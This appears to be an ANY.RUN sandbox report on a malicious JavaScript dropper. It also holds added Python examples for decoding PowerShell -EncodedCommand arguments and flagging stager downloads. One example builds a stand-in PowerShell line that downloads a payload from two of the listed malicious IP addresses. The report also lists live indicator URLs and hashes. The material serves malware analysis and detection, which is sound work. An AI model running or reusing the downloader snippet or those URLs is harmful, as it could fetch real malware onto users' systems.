Field | Value
---|---
File name | DETAILSE[XmL098].js
Full analysis | https://app.any.run/tasks/7f85e04c-cc26-49f7-a013-da8d2da23f66
Verdict | Malicious activity
Analysis date | March 31, 2023, 22:35:21
OS | Windows 10 Professional (build: 19044, 64 bit)
Indicators | 
MIME | text/plain
File info | ASCII text, with very long lines, with CRLF line terminators
MD5 | AEFA4EF9E799DBE4EA202393C08FBA85
SHA1 | D6A0909B03A6E2E6D8D7FBE45341D3AD318FD878
SHA256 | 649B30A8DECA5C0AA4DC68161E4D7C75B8BCBF47709C447BC49F932C8FF293CF
SSDEEP | 1536:FevaBD/8NRPIzPMc7XPNQ5yA+wWsARvABaxz/R7sPUCSCKJ7dOE3nM3Vr3rnP5eX:FevaBD/8NRPIzPMc7XPNQ5yA+wWsARv1
PID | CMD | Path | Indicators | Parent process
---|---|---|---|---
4636 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\Downloads\DETAILSE[XmL098].js" | C:\Windows\System32\wscript.exe | — | explorer.exe
5292 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "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" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |  | wscript.exe
5688 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe
5780 | C:\WINDOWS\System32\slui.exe -Embedding | C:\Windows\System32\slui.exe | — | svchost.exe

PID | User | Company | Integrity Level | Description | Exit code | Version
---|---|---|---|---|---|---
4636 | admin | Microsoft Corporation | MEDIUM | Microsoft ® Windows Based Script Host | 0 | 5.812.10240.16384
5292 | admin | Microsoft Corporation | MEDIUM | Windows PowerShell | 0 | 10.0.19041.1 (WinBuild.160101.0800)
5688 | admin | Microsoft Corporation | MEDIUM | Console Window Host | 0 | 10.0.19041.1 (WinBuild.160101.0800)
5780 | admin | Microsoft Corporation | MEDIUM | Windows Activation Client |  | 10.0.19041.1 (WinBuild.160101.0800)
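The chain above (explorer.exe starts wscript.exe on the .js, wscript.exe starts powershell.exe with -encodedcommand, conhost.exe is just the console for it) is what an analyst has to reconstruct first. The Python below is an added example and is not part of the ANY.RUN report: it decodes a PowerShell -EncodedCommand argument (base64 over UTF-16LE text) and flags any PowerShell instance that is spawned by a script host or carries an encoded command. The process records are a copy of the table above, but the encoded command is a constructed stand-in assembled from two URLs in the report's HTTP table, because the real argument is not reproduced here; SCRIPT_HOSTS, ENC_RE and triage() are this example's own.

```python
import base64
import re

# Constructed stand-in for the real -encodedcommand payload, which the report
# does not reproduce. It only mimics the observed behaviour: walk a hard-coded
# list of URLs (two of the six from the report's HTTP table) until one answers.
SAMPLE_PS = (
    "$u='http://141.94.86.90/CgbY7LBMow6.dat','http://199.247.30.203/AggtMGXPy.dat';"
    "foreach($x in $u){try{(New-Object Net.WebClient).DownloadFile($x,\"$env:TEMP\\a.dat\");break}catch{}}"
)


def encode_command(script: str) -> str:
    """Build what PowerShell expects after -EncodedCommand: base64 of UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_command(blob: str) -> str:
    """Inverse of encode_command; raises ValueError on a non-base64 token."""
    raw = base64.b64decode(blob, validate=True)
    return raw.decode("utf-16le")


# -e, -ec, -enc, -encodedcommand: powershell.exe accepts any unambiguous prefix.
# The (?!x) keeps -ExecutionPolicy from matching; the value is a quoted or bare
# base64 token of plausible length.
ENC_RE = re.compile(r'-e(?!x)[a-z]*\s+"?([A-Za-z0-9+/=]{16,})"?', re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"<>]+")

# Parents that should not be launching PowerShell in a normal user session.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}

# Process records modelled on the report's process table (constructed copy).
PROCESSES = [
    {"pid": 4636, "parent": "explorer.exe", "path": r"C:\Windows\System32\wscript.exe",
     "cmd": r'"C:\Windows\System32\WScript.exe" "C:\Users\admin\Downloads\DETAILSE[XmL098].js"'},
    {"pid": 5292, "parent": "wscript.exe",
     "path": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "'
            + encode_command(SAMPLE_PS) + '"'},
    {"pid": 5688, "parent": "powershell.exe", "path": r"C:\Windows\System32\conhost.exe",
     "cmd": r"\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1"},
]


def triage(processes):
    """One finding per PowerShell process that is spawned by a script host or
    carries an encoded command, with the decoded script and the URLs it embeds."""
    findings = []
    for p in processes:
        image = p["path"].rsplit("\\", 1)[-1].lower()
        if image not in ("powershell.exe", "pwsh.exe"):
            continue
        reasons = []
        if p["parent"].lower() in SCRIPT_HOSTS:
            reasons.append(f"spawned by {p['parent']}")
        decoded = None
        m = ENC_RE.search(p["cmd"])
        if m:
            try:
                decoded = decode_command(m.group(1))
                reasons.append("encoded command")
            except (ValueError, UnicodeDecodeError):
                reasons.append("undecodable -encodedcommand argument")
        if reasons:
            findings.append({"pid": p["pid"], "parent": p["parent"], "reasons": reasons,
                             "decoded": decoded, "urls": URL_RE.findall(decoded or "")})
    return findings


if __name__ == "__main__":
    for f in triage(PROCESSES):
        print(f"PID {f['pid']} ({', '.join(f['reasons'])})")
        print("  script:", f["decoded"])
        for u in f["urls"]:
            print("  url:", u)
```

On a real report, paste the base64 from the CMD column into decode_command(); the UTF-16LE step is the one most ad-hoc decoders get wrong, and a script that decodes to alternating NUL bytes is the sign that it was skipped.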
PID | Process | Key | Operation | Name | Value
---|---|---|---|---|---
4636 | wscript.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | ProxyBypass | 1
4636 | wscript.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | IntranetName | 1
4636 | wscript.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | UNCAsIntranet | 1
4636 | wscript.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | AutoDetect | 0
5292 | powershell.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | ProxyBypass | 1
5292 | powershell.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | IntranetName | 1
5292 | powershell.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | UNCAsIntranet | 1
5292 | powershell.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | AutoDetect | 0

Both processes write the same four ZoneMap values. This is the Internet Explorer security-zone initialisation that WinINet/urlmon performs the first time a process uses them, so it shows that the script and the PowerShell child both loaded the Windows HTTP stack; it is not a deliberate configuration change and is seen from benign processes as well.
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
5292 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_f4kbo3jm.lmj.psm1 | text | D17FE0A3F47BE24A6453E9EF58C94641 | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5292 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_lqb5dz0i.kk3.ps1 | text | D17FE0A3F47BE24A6453E9EF58C94641 | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5292 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | text | 1ACADA3C580D8D7AB5D8C84B136C78F1 | 1D4C4668DC6191C5C0B132D76740E086EC867304A736C82CA26AC5B026295207
5292 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | 203DB5CE127AD004329D286F63C10AE2 | 099572E1F7DCF7DD9BF46855799F33941B2213C63E010EF0FC62699832BC9FA4

All four are routine PowerShell start-up artifacts: the __PSScriptPolicyTest_* files are the probe PowerShell writes to test whether AppLocker/WDAC constrains script execution, and the CLR usage log and StartupProfileData are .NET and PowerShell caches. The report lists no other file written by the sample, which matches the failed downloads in the HTTP table.
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
---|---|---|---|---|---|---|---|---|---
5292 | powershell.exe | GET | 404 | 141.94.86.90:80 | http://141.94.86.90/CgbY7LBMow6.dat | FR | xml | 341 b | malicious
5292 | powershell.exe | GET | 404 | 199.247.30.203:80 | http://199.247.30.203/AggtMGXPy.dat | NL | xml | 341 b | malicious
5292 | powershell.exe | GET | 404 | 104.225.129.114:80 | http://104.225.129.114/WmtSH0otjE9.dat | US | xml | 341 b | malicious
5292 | powershell.exe | GET | 404 | 85.239.41.205:80 | http://85.239.41.205/A4ruswASuBy.dat | CY | xml | 341 b | malicious
5292 | powershell.exe | GET | 404 | 216.146.25.129:80 | http://216.146.25.129/RXc5cyP.dat | US | xml | 341 b | malicious
5292 | powershell.exe | GET | 404 | 94.131.117.111:80 | http://94.131.117.111/H40Wz1K8.dat | US | xml | 341 b | malicious
3128 | slui.exe | POST | 404 | 52.161.91.37:443 | https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail | US | xml | 341 b | whitelisted

All six payload requests come from the same PowerShell process (PID 5292), go over cleartext HTTP to bare IPv4 addresses in six different networks and countries, each ask for a differently named .dat file, and each receive a 404 with an identical 341-byte body. The script walked a fallback list of hosts and the second stage was not retrieved during this run, so the infrastructure was already down or was not serving this sample at analysis time. The slui.exe POST is Windows activation traffic from the sandbox image and unrelated to the sample.
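Reading the request table with a detection eye: one PID cycling through several bare-IP hosts for the same kind of file is the stager fallback-list pattern, and it is worth automating the read. The Python below is an added example and is not part of the ANY.RUN report: it parses rows in the layout of the table above (a constructed copy of the seven requests), scores each request on a few generic client-and-host heuristics, and summarises the result as block-list IPs, the PIDs showing the fallback pattern, and whether any payload fetch actually succeeded. LOLBIN_CLIENTS, PAYLOAD_EXTS, the threshold of two reasons and the function names are this example's own choices.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed copy of the report's HTTP table: PID | process | method | status | peer | URL
HTTP_ROWS = """\
5292 | powershell.exe | GET | 404 | 141.94.86.90:80 | http://141.94.86.90/CgbY7LBMow6.dat
5292 | powershell.exe | GET | 404 | 199.247.30.203:80 | http://199.247.30.203/AggtMGXPy.dat
5292 | powershell.exe | GET | 404 | 104.225.129.114:80 | http://104.225.129.114/WmtSH0otjE9.dat
5292 | powershell.exe | GET | 404 | 85.239.41.205:80 | http://85.239.41.205/A4ruswASuBy.dat
5292 | powershell.exe | GET | 404 | 216.146.25.129:80 | http://216.146.25.129/RXc5cyP.dat
5292 | powershell.exe | GET | 404 | 94.131.117.111:80 | http://94.131.117.111/H40Wz1K8.dat
3128 | slui.exe | POST | 404 | 52.161.91.37:443 | https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail
"""

# Windows binaries that rarely have a legitimate reason to fetch files from the internet.
LOLBIN_CLIENTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe",
                  "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}
PAYLOAD_EXTS = (".dat", ".bin", ".exe", ".dll", ".ps1")


def parse_rows(text):
    """Turn pipe-separated report rows into dicts."""
    rows = []
    for line in text.strip().splitlines():
        pid, proc, method, code, peer, url = (c.strip() for c in line.split("|"))
        rows.append({"pid": int(pid), "process": proc, "method": method,
                     "code": int(code), "peer": peer, "url": url})
    return rows


def literal_ip(url):
    """The host of url if it is a bare IP address, else None."""
    host = urlsplit(url).hostname or ""
    try:
        return str(ipaddress.ip_address(host))
    except ValueError:
        return None


def score(row):
    """List of reasons this request looks like a stager download."""
    parts = urlsplit(row["url"])
    reasons = []
    if row["process"].lower() in LOLBIN_CLIENTS:
        reasons.append("script-host client")
    if literal_ip(row["url"]):
        reasons.append("bare IP host")
    if parts.scheme == "http":
        reasons.append("cleartext HTTP")
    if parts.path.lower().endswith(PAYLOAD_EXTS):
        reasons.append("payload-like path")
    return reasons


def summarize(rows, threshold=2):
    """Flag rows with at least `threshold` reasons and derive IOCs from them."""
    flagged = [dict(r, reasons=score(r)) for r in rows if len(score(r)) >= threshold]
    ips = sorted({ip for r in flagged if (ip := literal_ip(r["url"]))},
                 key=ipaddress.ip_address)
    # One PID contacting three or more distinct peers for flagged requests is
    # the fallback-list pattern; no 2xx among them means nothing came back.
    by_pid = {}
    for r in flagged:
        by_pid.setdefault(r["pid"], set()).add(r["peer"])
    fallback_pids = sorted(pid for pid, peers in by_pid.items() if len(peers) >= 3)
    retrieved = any(200 <= r["code"] < 300 for r in flagged)
    return {"flagged": flagged, "ips": ips, "urls": [r["url"] for r in flagged],
            "fallback_pids": fallback_pids, "payload_retrieved": retrieved}


if __name__ == "__main__":
    s = summarize(parse_rows(HTTP_ROWS))
    for r in s["flagged"]:
        print(f"{r['pid']} {r['process']} {r['code']} {r['url']}  <- {', '.join(r['reasons'])}")
    print("block-list IPs:", " ".join(s["ips"]))
    print("fallback PIDs:", s["fallback_pids"], "| payload retrieved:", s["payload_retrieved"])
```

The activation POST from slui.exe scores zero on every heuristic and drops out on its own, which is the point of scoring on client identity and host shape rather than on the 404 status: the 404s tell you the download failed, not whether the request was hostile.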
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
5292 | powershell.exe | 94.131.117.111:80 | — | ZAYO-6461 | US | malicious |
5292 | powershell.exe | 141.94.86.90:80 | — | OVH SAS | FR | malicious |
5292 | powershell.exe | 199.247.30.203:80 | — | AS-CHOOPA | NL | malicious |
5292 | powershell.exe | 216.146.25.129:80 | — | CLOUDIE-NETWORKS-LLC | US | malicious |
5292 | powershell.exe | 104.225.129.114:80 | — | SHOCK-1 | US | malicious |
5292 | powershell.exe | 85.239.41.205:80 | — | Cloudlayer8 Limited | CY | malicious |
5952 | MoUsoCoreWorker.exe | 20.73.194.208:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
4716 | svchost.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
— | — | 52.161.91.37:443 | activation-v2.sls.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | suspicious |
5680 | svchost.exe | 20.73.194.208:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
Domain | IP | Reputation
---|---|---
settings-win.data.microsoft.com |  | whitelisted
activation-v2.sls.microsoft.com |  | whitelisted
self.events.data.microsoft.com |  | whitelisted
PID | Process | Class | Message |
---|---|---|---|
5292 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
5292 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
5292 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
5292 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
5292 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
5292 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |